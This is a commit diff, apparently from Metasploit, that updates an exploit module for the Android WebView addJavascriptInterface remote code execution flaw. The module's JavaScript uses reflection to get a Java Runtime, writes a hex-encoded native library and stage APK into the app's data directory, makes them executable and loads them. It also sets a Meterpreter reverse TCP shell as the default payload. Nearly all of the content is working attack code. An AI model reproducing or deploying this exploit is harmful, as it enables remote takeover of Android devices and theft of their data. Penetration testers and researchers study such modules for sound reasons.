native jni stager
parent
4f31eba7f4
commit
c76924e946
|
@ -58,9 +58,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
|
['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
|
||||||
['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py']
|
['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py']
|
||||||
],
|
],
|
||||||
'Platform' => 'linux',
|
'Platform' => 'android',
|
||||||
'Arch' => ARCH_ARMLE,
|
'Arch' => ARCH_DALVIK,
|
||||||
'DefaultOptions' => { 'PrependFork' => true },
|
'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp', },
|
||||||
'Targets' => [ [ 'Automatic', {} ] ],
|
'Targets' => [ [ 'Automatic', {} ] ],
|
||||||
'DisclosureDate' => 'Dec 21 2012',
|
'DisclosureDate' => 'Dec 21 2012',
|
||||||
'DefaultTarget' => 0,
|
'DefaultTarget' => 0,
|
||||||
|
@ -86,6 +86,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
send_response_html(cli, html)
|
send_response_html(cli, html)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def dalvikstager()
|
||||||
|
localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libdalvikstager.so')
|
||||||
|
data = File.read(localfile, {:mode => 'rb'})
|
||||||
|
data
|
||||||
|
end
|
||||||
|
|
||||||
def js
|
def js
|
||||||
%Q|
|
%Q|
|
||||||
function exec(obj) {
|
function exec(obj) {
|
||||||
|
@ -94,18 +100,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
// get the runtime so we can exec
|
// get the runtime so we can exec
|
||||||
var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
|
var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
|
||||||
var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}";
|
var runtime = m.invoke(null, null);
|
||||||
|
var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}";
|
||||||
|
var libraryData = "#{Rex::Text.to_hex(dalvikstager, '\\\\x')}";
|
||||||
|
|
||||||
// get the process name, which will give us our data path
|
// get the process name, which will give us our data path
|
||||||
var p = m.invoke(null, null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
|
var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
|
||||||
var ch, path = '/data/data/';
|
var ch, path = '/data/data/';
|
||||||
while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }
|
while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }
|
||||||
path += '/#{Rex::Text.rand_text_alpha(8)}';
|
var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
|
||||||
|
var stagePath = path + '/stage.apk';
|
||||||
|
|
||||||
// build the binary, chmod it, and execute it
|
// build the library and chmod it
|
||||||
m.invoke(null, null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor();
|
runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor();
|
||||||
m.invoke(null, null).exec(['chmod', '700', path]).waitFor();
|
runtime.exec(['chmod', '700', libraryPath]).waitFor();
|
||||||
m.invoke(null, null).exec([path]);
|
|
||||||
|
// build the stage, chmod it, and load it
|
||||||
|
runtime.exec(['/system/bin/sh', '-c', 'echo "'+stageData+'" > '+stagePath]).waitFor();
|
||||||
|
runtime.exec(['chmod', '700', stagePath]).waitFor();
|
||||||
|
|
||||||
|
runtime.load(libraryPath);
|
||||||
|
|
||||||
return true;
|
return true;
|
||||||
}
|
}
|
||||||
|
|
Loading…
Reference in New Issue